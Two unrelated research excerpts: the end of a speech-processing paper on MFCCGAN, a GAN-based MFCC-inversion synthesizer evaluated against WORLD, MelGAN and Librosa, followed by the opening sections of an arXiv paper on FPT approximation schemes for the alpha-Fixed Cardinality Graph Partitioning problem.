\hline 1 & Conv1d & N\(\times\)1\(\times\)8206 & 1 & 16 & 15 & 1 & 0 & 1 & N\(\times\)16\(\times\)8192 \\
\hline 2 & Conv1d (downsample 4x) & N\(\times\)16\(\times\)8192 & 16 & 64 & 41 & 4 & 20 & 1 & N\(\times\)64\(\times\)2048 \\
\hline 3 & Conv1d (downsample 4x) & N\(\times\)64\(\times\)2048 & 64 & 256 & 41 & 4 & 20 & 1 & N\(\times\)256\(\times\)512 \\
\hline 4 & Conv1d (downsample 4x) & N\(\times\)256\(\times\)512 & 256 & 1024 & 41 & 4 & 20 & 1 & N\(\times\)1024\(\times\)128 \\
\hline 5 & Conv1d (downsample 4x) & N\(\times\)1024\(\times\)128 & 1024 & 1024 & 41 & 4 & 20 & 1 & N\(\times\)1024\(\times\)32 \\
\hline 6 & Conv1d & N\(\times\)1024\(\times\)32 & 1024 & 1024 & 5 & 1 & 2 & 1 & N\(\times\)1024\(\times\)32 \\
\hline 7 & Conv1d & N\(\times\)1024\(\times\)32 & 1024 & 1 & 3 & 1 & 1 & 1 & N\(\times\)1\(\times\)32 \\
\hline
\end{tabular}
\end{table} Table 2: Specifications of each layer of Discriminator I in sequence

\begin{table}
\begin{tabular}{|c|c|c|c|}
\hline & WORLD Synthesizer (MFCC 36) & MFCCGAN (MFCC 36) & MelGAN (Mel-spectrogram 80) \\
\hline STOI & 0.6911 & 0.7664 & 0.9413 \\
\hline NISQA & 2.9501 & 3.0777 & 3.1934 \\
\hline
\end{tabular}
\end{table} Table 4: STOI/NISQA measures for reconstructed signals by the proposed model in comparison with the WORLD and MelGAN speech synthesizers

To better specify the performance of our proposed system, we compare it with its rival, Librosa, a well-known MFCC-inversion tool. Since we used Librosa for MFCC feature extraction to prepare the input for training and evaluating our proposed model, we planned another experiment comparing our proposed model with Librosa as a rule-based, conventional MFCC feature extraction and MFCC-inversion tool. We extracted MFCC coefficients for 100 original speech utterances selected from the LJSpeech database. After that, we reconstructed 100 speech files from the MFCC sequences of the 100 original files using Griffin-Lim (Librosa) as the synthesis tool. We measured the intelligibility of these 100 reconstructed files with the STOI metric against their 100 paired original utterances (files). Table 5 shows these results. We repeated this experiment with five different numbers of MFCC features, namely 13, 24, 36, 39, and 80, for each of the 100 files. As can be observed in this table, our proposed system clearly outperforms the Librosa MFCC-inversion in terms of intelligibility, with a 26% to 53% increase in STOI, and naturalness, with a 16% to 78% increase in NISQA score. To compare our proposed system with Librosa and WORLD subjectively, we carried out a subjective webMUSHRA experimental test, following the ITU recommendations [39]. As illustrated in Fig. 1, the proposed approach gives good-quality results. It is worth noting that the MFCCGAN quality is close to, and even higher than, that of WORLD, although WORLD receives extra information such as pitch and voiced/unvoiced frames while MFCCGAN depends only on the MFCC features. Such a system can be used in various areas of speech processing, e.g., speech synthesis, speech coding, voice conversion, and other similar speech reproduction applications, wherever MFCCs are used as features. 
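For context, the rule-based baseline in this comparison can be reproduced with librosa's built-in MFCC inversion, which undoes the DCT/log/Mel chain and estimates phase with Griffin-Lim. The parameter values below are assumptions, not the exact settings used in the paper.

```python
import librosa

def librosa_mfcc_inversion(mfcc, sr=22050, n_mels=128, hop_length=256):
    # Rule-based baseline: invert the MFCC chain and run Griffin-Lim for phase,
    # mirroring the Librosa comparison discussed above (Table 5).
    return librosa.feature.inverse.mfcc_to_audio(
        mfcc, n_mels=n_mels, sr=sr, hop_length=hop_length)

# Intelligibility scoring against the reference could then be done with, e.g.,
# the third-party pystoi package (assumed installed):
#   from pystoi import stoi
#   score = stoi(reference_wav, reconstructed_wav, sr, extended=False)
```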
To evaluate the effect of (5), we retrained our proposed MFCCGAN with 36 MFCCs using the novel loss function. In this new configuration, the STOI score increased to 0.7764 (a 1.3% increase) and the NISQA score to 3.4027 (a 10% increase in naturalness) in comparison with the ordinary MFCCGAN. ## 6 Coding Application Since MFCCGAN works with a fixed number of features at each frame, this system can be used for high-quality speech coding. Depending on the available bandwidth and the desired quality, according to Table 6, bit rates ranging from 13 to 80 kbps are achievable. Our future work will focus on reaching high-quality, low-bit-rate audio coding based on MFCCGAN. ## 7 Conclusion and Future Works In this paper, we proposed an MFCC-inversion-based speech synthesizer using adversarial learning. The results show that the proposed approach improves the intelligibility measure (STOI) by at least 10% and naturalness by 4% in comparison with the traditional rule-based algorithm WORLD. Also, the proposed system achieves at least a 26% increase in intelligibility and a 16% increase in naturalness in comparison with Griffin-Lim (the Librosa tool). Subjective test results of the proposed system also outperform its conventional counterparts. This work could be used as a synthesizer in many speech tasks such as coding, text-to-speech, and voice conversion applications. Applying a perceptual (STOI) optimization further improved the output quality. Since the proposed approach achieved a higher webMUSHRA score at low-bit-rate coding, this suggests that such an approach could be extended to low-bit-rate audio coding. In addition to working on quality improvement, our future work will focus on reaching high-quality, low-bit-rate audio coding based on MFCCGAN. MFCCGAN can also be adopted in speech enhancement tasks. Making MFCCGAN end-to-end is also a future research prospect.
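As a rough illustration of how a range like the quoted 13 to 80 kbps can arise from the number of transmitted coefficients, the back-of-the-envelope sketch below multiplies coefficients per frame by frame rate and quantization depth. The hop length, sample rate, and 12-bit quantization are assumptions chosen only so the figures land near the quoted range; Table 6 of the paper remains the authoritative source.

```python
# Illustrative codec bit-rate estimate: coefficients/frame x frames/s x bits/coefficient.
# All parameter values here are assumptions, not settings reported in the paper.
def mfcc_bitrate_kbps(n_mfcc, sr=22050, hop_length=256, bits_per_coeff=12):
    frames_per_second = sr / hop_length          # roughly 86 frames/s for these settings
    return n_mfcc * frames_per_second * bits_per_coeff / 1000.0

for n in (13, 24, 36, 39, 80):
    print(n, round(mfcc_bitrate_kbps(n), 1), "kbps")
```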
2308.15546
FPT Approximation and Subexponential Algorithms for Covering Few or Many Edges
We study the \textsc{$\alpha$-Fixed Cardinality Graph Partitioning ($\alpha$-FCGP)} problem, the generic local graph partitioning problem introduced by Bonnet et al. [Algorithmica 2015]. In this problem, we are given a graph $G$, two numbers $k,p$, and a real $0\leq\alpha\leq 1$; the question is whether there is a set $S\subseteq V$ of size $k$ with a specified coverage function $cov_{\alpha}(S)$ at least $p$ (or at most $p$ for the minimization version). The coverage function $cov_{\alpha}(\cdot)$ counts edges with exactly one endpoint in $S$ with weight $\alpha$ and edges with both endpoints in $S$ with weight $1 - \alpha$. $\alpha$-FCGP generalizes a number of fundamental graph problems such as \textsc{Densest $k$-Subgraph}, \textsc{Max $k$-Vertex Cover}, and \textsc{Max $(k,n-k)$-Cut}. A natural question in the study of $\alpha$-FCGP is whether the algorithmic results known for its special cases, like \textsc{Max $k$-Vertex Cover}, could be extended to more general settings. One of the simple but powerful methods for obtaining parameterized approximation [Manurangsi, SOSA 2019] and subexponential algorithms [Fomin et al. IPL 2011] for \textsc{Max $k$-Vertex Cover} is based on greedy vertex degree orderings. The main insight of our work is that the idea of greedy vertex degree ordering can be used to design fixed-parameter approximation schemes (FPT-AS) for $\alpha > 0$ and subexponential-time algorithms for the problem on apex-minor free graphs for maximization with $\alpha > 1/3$ and minimization with $\alpha < 1/3$.
Fedor V. Fomin, Petr A. Golovach, Tanmay Inamdar, Tomohiro Koana
2023-08-29T18:11:03Z
http://arxiv.org/abs/2308.15546v1
# FPT Approximation and Subexponential Algorithms for Covering Few or Many Edges ###### Abstract We study the \(\alpha\)-Fixed Cardinality Graph Partitioning (\(\alpha\)-FCGP) problem, the generic local graph partitioning problem introduced by Bonnet et al. [2]. Footnote 1: Bonnet et al. [2] called the problem ‘local graph partitioning problem’; however, we adopt the nomenclature from Koana et al. [19]. In this problem, we are given a graph \(G\), two numbers \(k,p\), and \(0\leq\alpha\leq 1\); the question is whether there is a set \(S\subseteq V\) of size exactly \(k\) with \(\mathsf{cov}_{\alpha}(S)\geq p\) (\(\mathsf{cov}_{\alpha}(S)\leq p\) for the minimization variant), where \[\mathsf{cov}_{\alpha}(S)\coloneqq(1-\alpha)\cdot m(S)+\alpha\cdot m(S,V\setminus S).\] Here, \(m(S)\) is the number of edges with both endpoints in \(S\), and \(m(S,V\setminus S)\) is the number of edges with one endpoint in \(S\) and the other in \(V\setminus S\). We will call the maximization and minimization problems Max \(\alpha\)-FCGP and Min \(\alpha\)-FCGP, respectively. This problem generalizes many problems, namely, Densest \(k\)-Subgraph (for \(\alpha=0\)), Max \(k\)-Vertex Cover (for \(\alpha=1/2\)), Max \((k,n-k)\)-Cut (for \(\alpha=1\)), and their minimization counterparts. Although there is a plethora of publications that study these special cases, the general \(\alpha\)-FCGP has not received much attention, except for the work of Bonnet et al. [2], Koana et al. [19], and Shachnai and Zehavi [24]. In this paper, we aim to demonstrate the wider potential of the existing algorithms designed for specific cases, such as Max \(k\)-Vertex Cover, by presenting an algorithm that can handle the more general problem of \(\alpha\)-FCGP. Algorithms for these specific cases often rely on greedy vertex degree orderings. 
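Before discussing those greedy degree orderings further, the following sketch makes the coverage function defined above concrete; it simply evaluates \(\mathsf{cov}_{\alpha}(S)\) for a vertex set \(S\) using networkx and is only the definition, not an algorithm from this paper.

```python
# Evaluate cov_alpha(S) = (1 - alpha) * m(S) + alpha * m(S, V \ S) for a vertex set S.
import networkx as nx

def cov_alpha(G, S, alpha):
    S = set(S)
    m_inside = sum(1 for u, v in G.edges() if u in S and v in S)
    m_cut = sum(1 for u, v in G.edges() if (u in S) != (v in S))
    return (1 - alpha) * m_inside + alpha * m_cut

G = nx.petersen_graph()
print(cov_alpha(G, {0, 1, 2}, 0.5))   # Max k-Vertex Cover weighting (alpha = 1/2)
```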
For instance, Manurangsi [20], showing that a \((1-\varepsilon)\)-approximate solution can be found in the set of \(\mathcal{O}(k/\varepsilon)\) vertices with the largest degrees, gave a \((1-\varepsilon)\)-approximation algorithm for Max \(k\)-Vertex Cover that runs in time \((1/\varepsilon)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\). Fomin et al. [14] gave a \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\)-time algorithm for Max \(k\)-Vertex Cover on apex-minor free graphs via bidimensionality arguments, by showing that an optimal solution \(S\) is adjacent to every vertex of degree at least \(d+1\), where \(d\) is the minimum degree over vertices in \(S\). In this work, we will give approximation algorithms as well as subexponential-time algorithms for apex-minor free graphs exploiting the greedy vertex ordering. For approximation algorithms, we will show that both Max \(\alpha\)-FCGP and Min \(\alpha\)-FCGP admit _FPT Approximation Schemes_ (FPT-AS) for \(\alpha>0\), i.e., there is an algorithm running in time \((\frac{k}{\varepsilon\alpha})^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\) that finds a set \(S\) of size \(k\) with \(\mathsf{cov}_{\alpha}(S)\geq(1-\varepsilon)\cdot\mathsf{OPT}\) (or \(\mathsf{cov}_{\alpha}(S)\leq(1+\varepsilon)\cdot\mathsf{OPT}\) for the minimization variant), where \(\mathsf{OPT}\) denotes the optimal value of \(p\). Previously, the special cases were known to admit FPT approximation schemes; see [22, 16, 17, 20] for \(\alpha=1/2\) and [2] for \(\alpha=1\). In particular, the state-of-the-art running time for Max \(\alpha\)-FCGP with \(\alpha=1/2\) is the aforementioned algorithm of Manurangsi that runs in time \((1/\varepsilon)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\) for maximization (also for the minimization variant). We generalize this argument for \(\alpha\geq 1/3\), leading to a faster FPT-AS for Max \(\alpha\)-FCGP in this range. For \(\alpha=0\), the situation is more negative; Max \(\alpha\)-FCGP (namely, Densest \(k\)-Subgraph) does not admit any \(o(k)\)-approximation algorithm with running time \(f(k)\cdot n^{\mathcal{O}(1)}\) under the Strongish Planted Clique Hypothesis [21]. Min \(\alpha\)-FCGP is also hard to approximate when \(\alpha=0\) since it encompasses Independent Set as a special case for \(p=0\). Next, we discuss the regime of subexponential-time algorithms. Amini et al. [1] showed that Max \(k\)-Vertex Cover is FPT on graphs of bounded degeneracy, including planar graphs, giving a \(k^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\)-time algorithm. They left it open whether it can be solved in time \(2^{o(k)}\cdot n^{\mathcal{O}(1)}\). This was answered in the affirmative by Fomin et al. [14], who showed that Max \(k\)-Vertex Cover on apex-minor free graphs can be solved in \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\) time. Generalizing this result, we give a \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\)-time algorithm for Max \(\alpha\)-FCGP with \(\alpha>1/3\) and Min \(\alpha\)-FCGP with \(\alpha<1/3\). The complexity landscape of Max \(\alpha\)-FCGP with \(\alpha<1/3\) (and Min \(\alpha\)-FCGP with \(\alpha>1/3\)) is not well understood. It is a long-standing open question whether Densest \(k\)-Subgraph on planar graphs is NP-hard [4]. Note that the special case Clique is trivially polynomial-time solvable on planar graphs because a clique on \(5\) vertices does not admit a planar embedding. 
Further related work. As mentioned, special cases of \(\alpha\)-FCGP when \(\alpha\in\{0,1/2,1\}\) have been extensively studied. For instance, the W[1]-hardness for the parameter \(k\) has been long known for these special cases [3, 11, 15]. Both Max \(\alpha\)-FCGP and Min \(\alpha\)-FCGP are actually W[1]-hard for every \(\alpha\in[0,1]\) with the exception of \(\alpha=1/3\), as can be seen from a parameterized reduction from Clique and Independent Set on regular graphs. Note that \(\alpha\)-Fixed Cardinality Graph Partitioning becomes trivial when \(\alpha=1/3\) because \(\mathsf{cov}_{\alpha}(S)=\frac{1}{3}\cdot\sum_{v\in S}d(v)\) for any \(S\subseteq V\), where \(d(v)\) is the degree of \(v\). Bonnet et al. [2] gave a \((\Delta k)^{2k}\cdot n^{\mathcal{O}(1)}\)-time algorithm for \(\alpha\)-FCGP where \(\Delta\) is the maximum degree. They also gave an algorithm with running time \(\Delta^{k}\cdot n^{\mathcal{O}(1)}\) for Max \(\alpha\)-FCGP with \(\alpha>1/3\) and Min \(\alpha\)-FCGP with \(\alpha<1/3\). This result was strengthened by Shachnai and Zehavi [24]; they gave a \(4^{k+o(k)}\Delta^{k}\cdot n^{\mathcal{O}(1)}\)-time algorithm for any value of \(\alpha\). Koana et al. [19] showed that Max \(\alpha\)-FCGP admits polynomial kernels on sparse families of graphs when \(\alpha>1/3\). For instance, Max \(\alpha\)-FCGP admits a \(k^{\mathcal{O}(d)}\)-sized kernel where \(d\) is the degeneracy of the input graph. They also showed analogous results for Min \(\alpha\)-FCGP with \(\alpha<1/3\). Preliminaries. For an integer \(n\), let \([n]\) denote the set \(\{1,\cdots,n\}\). We use the standard graph-theoretic notation and refer to the textbook of Diestel [10] for undefined notions. In this work, we assume that all graphs are simple and undirected. For a graph \(G\) and a vertex set \(S\), let \(G[S]\) be the subgraph of \(G\) induced by \(S\). For a vertex \(v\) in \(G\), let \(d(v)\) be its _degree_, i.e., the number of its neighbors. For vertex sets \(X,Y\), let \(m(X)\coloneqq|\{uv\in E\mid u,v\in X\}|\) and \(m(X,Y)\coloneqq|\{uv\in E\mid u\in X,v\in Y\}|\). In this work, an optimal solution for Max \(\alpha\)-FCGP (and Min \(\alpha\)-FCGP) is a vertex set \(S\) of size \(k\) such that \(\mathsf{cov}_{\alpha}(S)\geq\mathsf{cov}_{\alpha}(S^{\prime})\) (resp., \(\mathsf{cov}_{\alpha}(S)\leq\mathsf{cov}_{\alpha}(S^{\prime})\)) for every vertex set \(S^{\prime}\) of size \(k\). A graph \(H\) is a _minor_ of \(G\) if a graph isomorphic to \(H\) can be obtained from \(G\) by vertex and edge removals and edge contractions. Given a graph \(H\), a family of graphs \(\mathcal{H}\) is said to be _\(H\)-minor free_ if there is no \(G\in\mathcal{H}\) having \(H\) as a minor. A graph \(H\) is an _apex graph_ if \(H\) can be made planar by the removal of a single vertex. We refer to the textbook of Cygan et al. [5] for an introduction to Parameterized Complexity, and we refer to the paper of Marx [22] for an introduction to the area of parameterized approximation. ## 2 FPT Approximation Algorithms In this section, we design FPT Approximation Schemes for Max \(\alpha\)-FCGP as well as Min \(\alpha\)-FCGP parameterized by \(k\) and \(\alpha\), assuming \(\alpha>0\). **Theorem 1**.: _For any \(0<\alpha\leq 1\) and \(0<\varepsilon\leq 1\), Max \(\alpha\)-FCGP and Min \(\alpha\)-FCGP each admits an FPT-AS parameterized by \(k\), \(\varepsilon\) and \(\alpha\). 
More specifically, given a graph \(G=(V,E)\) and an integer \(k\), there exists an algorithm that runs in time \(\left(\frac{k}{\varepsilon\alpha}\right)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\), and finds a set \(S\subseteq V\) such that \(\mathsf{cov}_{\alpha}(S)\geq(1-\varepsilon)\cdot\mathsf{cov}_{\alpha}(O)\) for Max \(\alpha\)-FCGP and \(\mathsf{cov}_{\alpha}(S)\leq(1+\varepsilon)\cdot\mathsf{cov}_{\alpha}(O)\) for Min \(\alpha\)-FCGP, where \(O\subseteq V\) is an optimal solution._ For the case that \(\mathsf{OPT}\coloneqq\mathsf{cov}_{\alpha}(O)\) is large, the following greedy argument will be helpful. **Lemma 1**.: _For Max \(\alpha\)-FCGP, let \(S\) be the set of \(k\) vertices with the largest degrees. Then, \(\mathsf{cov}_{\alpha}(S)\geq\mathsf{OPT}-2k^{2}\). For Min \(\alpha\)-FCGP, let \(S\) be the set of \(k\) vertices with the smallest degrees. Then, \(\mathsf{cov}_{\alpha}(S)\leq\mathsf{OPT}+2k^{2}\)._ Proof.: Without loss of generality, we assume that \(O\neq S\). Let \(S\setminus O=\{y_{1},y_{2},\ldots,y_{t}\}\), and \(O\setminus S=\{w_{1},w_{2},\ldots,w_{t}\}\), where \(1\leq t\leq k\). Here, we index the vertices so that \(d(y_{i})\geq d(y_{j})\) and \(d(w_{i})\geq d(w_{j})\) (for Min \(\alpha\)-FCGP, \(d(y_{i})\leq d(y_{j})\) and \(d(w_{i})\leq d(w_{j})\)) for \(i<j\). Note that due to the choice of \(S\), it holds that \(d(y_{i})\geq d(w_{i})\) (\(d(y_{i})\leq d(w_{i})\) for Min \(\alpha\)-FCGP) for each \(1\leq i\leq t\). Now we define a sequence of solutions \(O_{0},O_{1},\ldots,O_{t}\), where \(O_{0}=O\), and for each \(1\leq i\leq t\), \(O_{i}\coloneqq(O_{i-1}\setminus\{w_{i}\})\cup\{y_{i}\}\). Note that \(O_{t}=S\). We claim that for each \(1\leq i\leq t\), \(\mathsf{cov}_{\alpha}(O_{i})\geq\mathsf{cov}_{\alpha}(O_{i-1})-2k\) for Max \(\alpha\)-FCGP and \(\mathsf{cov}_{\alpha}(O_{i})\leq\mathsf{cov}_{\alpha}(O_{i-1})+2k\) for Min \(\alpha\)-FCGP. To this end, we note that \(O_{i}\) is obtained from \(O_{i-1}\) by removing \(w_{i}\) and adding \(y_{i}\). Thus, \(\mathsf{cov}_{\alpha}(O_{i})=\mathsf{cov}_{\alpha}(O_{i-1})-(\alpha m_{1}+((1-\alpha)-\alpha)\cdot m_{2})+\alpha m_{3}+((1-\alpha)-\alpha)\cdot m_{4}\), where \[m_{1}\coloneqq m(\left\{w_{i}\right\},V\setminus O_{i-1}),\qquad m_{2}\coloneqq m(\left\{w_{i}\right\},O_{i-1}\setminus\{w_{i}\}),\] \[m_{3}\coloneqq m(\left\{y_{i}\right\},V\setminus O_{i}),\qquad m_{4}\coloneqq m(\left\{y_{i}\right\},O_{i}\setminus\{w_{i}\}).\] Observe that \(d(w_{i})-k\leq m_{1}\leq d(w_{i})\), \(d(y_{i})-k\leq m_{3}\leq d(y_{i})\), and \(0\leq m_{2},m_{4}\leq k\). We consider Max \(\alpha\)-FCGP first. We have that \[\mathsf{cov}_{\alpha}(O_{i})=\mathsf{cov}_{\alpha}(O_{i-1})+\alpha(m_{3}-m_{1})+(1-2\alpha)(m_{4}-m_{2})\] \[\geq\mathsf{cov}_{\alpha}(O_{i-1})+\alpha(m_{3}-m_{1})-|(1-2\alpha)(m_{4}-m_{2})|.\] Since \(m_{3}-m_{1}\geq d(y_{i})-d(w_{i})-k\geq-k\) and \(|(1-2\alpha)(m_{4}-m_{2})|\leq k\), we obtain \(\mathsf{cov}_{\alpha}(O_{i})\geq\mathsf{cov}_{\alpha}(O_{i-1})-2k\), regardless of the value of \(\alpha\). We consider Min \(\alpha\)-FCGP next. It holds that \[\mathsf{cov}_{\alpha}(O_{i})=\mathsf{cov}_{\alpha}(O_{i-1})+\alpha(m_{3}-m_{1})+(1-2\alpha)(m_{4}-m_{2})\] \[\leq\mathsf{cov}_{\alpha}(O_{i-1})+\alpha(m_{3}-m_{1})+|(1-2\alpha)(m_{4}-m_{2})|.\] Since \(m_{3}-m_{1}\leq d(y_{i})-d(w_{i})+k\leq k\) and \(|(1-2\alpha)(m_{4}-m_{2})|\leq k\), we obtain \(\mathsf{cov}_{\alpha}(O_{i})\leq\mathsf{cov}_{\alpha}(O_{i-1})+2k\), regardless of the value of \(\alpha\). 
Therefore, \(\mathsf{cov}_{\alpha}(O_{t})\geq\mathsf{cov}_{\alpha}(O_{0})-2kt\geq\mathsf{OPT}-2k^{2}\) for Max \(\alpha\)-FCGP and \(\mathsf{cov}_{\alpha}(O_{t})\leq\mathsf{cov}_{\alpha}(O_{0})+2kt\leq\mathsf{OPT}+2k^{2}\) for Min \(\alpha\)-FCGP. Lemma 1 allows us to find an approximate solution when \(\mathsf{OPT}\) is sufficiently large. The case that \(\mathsf{OPT}\) is small remains. We use different approaches for Max \(\alpha\)-FCGP and Min \(\alpha\)-FCGP. Algorithm for Max \(\alpha\)-FCGP. Let \(v_{1}\) be a vertex with the largest degree. Our algorithm considers two cases depending on whether \(d(v_{1})>\Delta\coloneqq\frac{2k^{2}}{\varepsilon\alpha}+k\). If \(d(v_{1})>\Delta\), we can argue that the set \(S\) from Lemma 1 is a \((1-\varepsilon)\)-approximate solution. To that end, we make the following observation. **Observation 1**.: _If \(d(v_{1})>\Delta\), then \(2k^{2}\leq\varepsilon\cdot\mathsf{cov}_{\alpha}(S)\)._ Proof.: Note that \(m(S,V\setminus S)=\sum_{u\in S}m(\left\{u\right\},V\setminus S)\geq m(\left\{v_{1}\right\},V\setminus S)\geq d(v_{1})-k\), where the inequality follows from the fact that at most \(k\) edges incident to \(v_{1}\) can have the other endpoint in \(S\). This implies that \[\mathsf{cov}_{\alpha}(S)\geq\alpha\cdot m(S,V\setminus S)\geq\alpha\cdot(d(v_{1})-k)\geq\frac{2k^{2}}{\varepsilon},\] where we use the assumptions that \(0<\alpha\leq 1\) and \(d(v_{1})>\Delta\). Thus, for \(d(v_{1})>\Delta\), we have \(\mathsf{OPT}\leq\mathsf{cov}_{\alpha}(S)+2k^{2}\leq(1+\varepsilon)\cdot\mathsf{cov}_{\alpha}(S)\), and thus \(\mathsf{cov}_{\alpha}(S)\geq(1-\varepsilon)\cdot\mathsf{OPT}\). So assume that \(d(v_{1})<\Delta\). In this case, the maximum degree of the graph is bounded by \(\Delta=\frac{2k^{2}}{\varepsilon\alpha}+k=\mathcal{O}(\frac{k^{2}}{\varepsilon\alpha})\), and we solve the problem optimally using the algorithm of Shachnai and Zehavi [24], which runs in time \(4^{k+o(k)}\cdot\Delta^{k}\cdot n^{\mathcal{O}(1)}\), i.e., at most \(\left(\frac{k^{2}}{\varepsilon\alpha}\right)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\). Combining both cases, we conclude the proof of Theorem 1 for Max \(\alpha\)-FCGP. Algorithm for Min \(\alpha\)-FCGP. For Min \(\alpha\)-FCGP, our algorithm considers two cases depending on the value of \(\mathsf{OPT}\). If \(\mathsf{OPT}\geq\frac{2k^{2}}{\varepsilon}\), then our algorithm returns the set \(S\) from Lemma 1. Note that \(\mathsf{cov}_{\alpha}(S)\leq\mathsf{OPT}+2k^{2}\leq(1+\varepsilon)\cdot\mathsf{OPT}\). Now suppose that \(\mathsf{OPT}<\frac{2k^{2}}{\varepsilon}\). In this case, we know that \(O\) cannot contain a vertex of degree larger than \(\Delta\coloneqq\frac{2k^{2}}{\alpha\varepsilon}+k\), for otherwise, \(\mathsf{cov}_{\alpha}(O)>\alpha(\Delta-k)\geq\mathsf{OPT}\), which is a contradiction. Thus, in this case the maximum degree of the graph is bounded by \(\Delta\), and again we can solve the problem optimally in time \(\left(\frac{k^{2}}{\varepsilon\alpha}\right)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\), using the algorithm of Shachnai and Zehavi [24] for Min \(\alpha\)-FCGP. Since the value of \(\mathsf{OPT}\) is unknown to us, we cannot directly conclude which case is applicable. So we find a solution for each case and return the better one. This completes the proof of Theorem 1 for Min \(\alpha\)-FCGP. 
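The case analysis behind Theorem 1 (maximization variant) can be summarized in the following schematic sketch, reusing the `cov_alpha` helper from the earlier snippet. The brute-force branch is only a stand-in for the Shachnai-Zehavi algorithm [24] and is exponential in \(n\), so this is an illustration of the structure rather than an implementation of the stated running time.

```python
# Schematic sketch of the Theorem 1 case split for Max alpha-FCGP.
from itertools import combinations

def fptas_max_fcgp(G, k, alpha, eps):
    nodes_by_degree = sorted(G.nodes(), key=G.degree, reverse=True)
    delta = 2 * k * k / (eps * alpha) + k
    if G.degree(nodes_by_degree[0]) > delta:
        # High-degree case: the k largest-degree vertices are (1 - eps)-approximate (Lemma 1).
        return set(nodes_by_degree[:k])
    # Bounded-degree case: solve exactly (placeholder brute force, not [24]).
    return max((set(S) for S in combinations(G.nodes(), k)),
               key=lambda S: cov_alpha(G, S, alpha))
```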
### Faster FPT-AS for Max \(\alpha\)-FCGP when \(\alpha\geq 1/3\) In this section, we show that a simpler idea of Manurangsi [20] gives a faster FPT-AS for Max \(\alpha\)-FCGP when \(\alpha\geq 1/3\), i.e., \(\alpha\geq 1-2\alpha\), leading to the following theorem. **Theorem 2**.: _For any \(1/3\leq\alpha\leq 1\), Max \(\alpha\)-FCGP admits an FPT-AS running in time \(\left(\frac{1}{\varepsilon}\right)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\)._ Proof.: Let \(0<\varepsilon<1\) be fixed and let us sort the vertices of \(V(G)\) by their degrees (breaking ties arbitrarily). Let \(V^{\prime}\subseteq V(G)\) denote the \(k+\lceil\frac{4k}{\varepsilon^{2}}\rceil\) vertices of the largest degrees. We show that \(V^{\prime}\) contains a \((1-\varepsilon)\)-approximate solution. Let \(O\) denote an optimal solution for Max \(\alpha\)-FCGP. Further define \(O_{i}\coloneqq O\cap V^{\prime}\), \(O_{o}\coloneqq O\setminus V^{\prime}\). Let \(U\coloneqq V^{\prime}\setminus O_{i}\) and let \(U^{*}\subseteq U\) be a subset of size \(|O_{o}|\) chosen uniformly at random from \(U\). Let \(\rho\coloneqq\frac{|O_{o}|}{|U|}\leq\frac{k}{|U|}\leq\varepsilon^{2}/4\). In Lemma 2, we show that \(\mathbb{E}[\mathsf{cov}_{\alpha}(O_{i}\cup U^{*})]\geq(1-\varepsilon)\cdot\mathsf{cov}_{\alpha}(O)\), which implies that \(V^{\prime}\) contains a \((1-\varepsilon)\)-approximate solution. The algorithm simply enumerates all subsets of size \(k\) from \(V^{\prime}\) and returns the best solution found. It follows that the running time of the algorithm is \(\binom{|V^{\prime}|}{k}\cdot n^{\mathcal{O}(1)}=\left(\frac{1}{\varepsilon}\right)^{\mathcal{O}(k)}\cdot n^{\mathcal{O}(1)}\). All that remains is the proof of the following lemma. **Lemma 2**.: \(\mathbb{E}[\mathsf{cov}_{\alpha}(O_{i}\cup U^{*})]\geq(1-\varepsilon)\cdot\mathsf{cov}_{\alpha}(O)\)_._ Proof.: We fix some notation. For a vertex \(u\in V\) and a subset \(R\subseteq V\), we use \(d_{R}(u)\) to denote the number of neighbors of \(u\) in \(R\). When \(R=V\), we use \(d(u)\) instead of \(d_{V}(u)\). Let \(S=O_{i}\cup U^{*}=(O\setminus O_{o})\cup U^{*}\). We want to analyze the expected value of \(\mathsf{cov}_{\alpha}(S)\). To this end, we write \(\mathsf{cov}_{\alpha}(S)=\mathsf{cov}_{\alpha}(O)-A+B\), where \(A\) is the "loss" in the objective due to the removal of \(O_{o}\) and \(B\) is the "gain" in the objective due to the addition of \(U^{*}\), defined as follows. \[A=\alpha\cdot m(O_{o},V\setminus O_{o})+(1-\alpha)\cdot m(O_{o})\] \[B=Q_{1}+Q_{2}-\alpha\cdot m(O_{i},U^{*}),\ \text{where}\] \[Q_{1}=\alpha\cdot m(U^{*},V\setminus(U^{*}\cup O_{i}))+(1-\alpha)\cdot m(U^{*})\] \[Q_{2}=(1-\alpha)\cdot m(O_{i},U^{*})\] \(Q_{1}\) is the total contribution of the edges with at least one endpoint in \(U^{*}\) and the other outside \(S\), and \(Q_{2}\) is the total contribution of edges with one endpoint in \(U^{*}\) and the other in \(O_{i}\). Note that the lemma is equivalent to showing that \(\mathbb{E}[B-A]\geq-\varepsilon\cdot\mathsf{cov}_{\alpha}(O)\), where the expectation is over the choice of \(U^{*}\). Since \(A\) does not depend on the choice of \(U^{*}\), we have \[\mathbb{E}[A]=A=\alpha\cdot m(O_{o},V\setminus O_{o})+(1-\alpha)\cdot m(O_{o})\leq\alpha\cdot m(O_{o},V\setminus O_{o})+2\alpha\cdot m(O_{o})=\alpha\sum_{v\in O_{o}}d(v) \tag{1}\] Here the inequality follows from \(\alpha\geq 1/3\). Now let us consider \(\mathbb{E}[B]=\mathbb{E}[Q_{1}+Q_{2}-\alpha\cdot m(U^{*},O_{i})]\). 
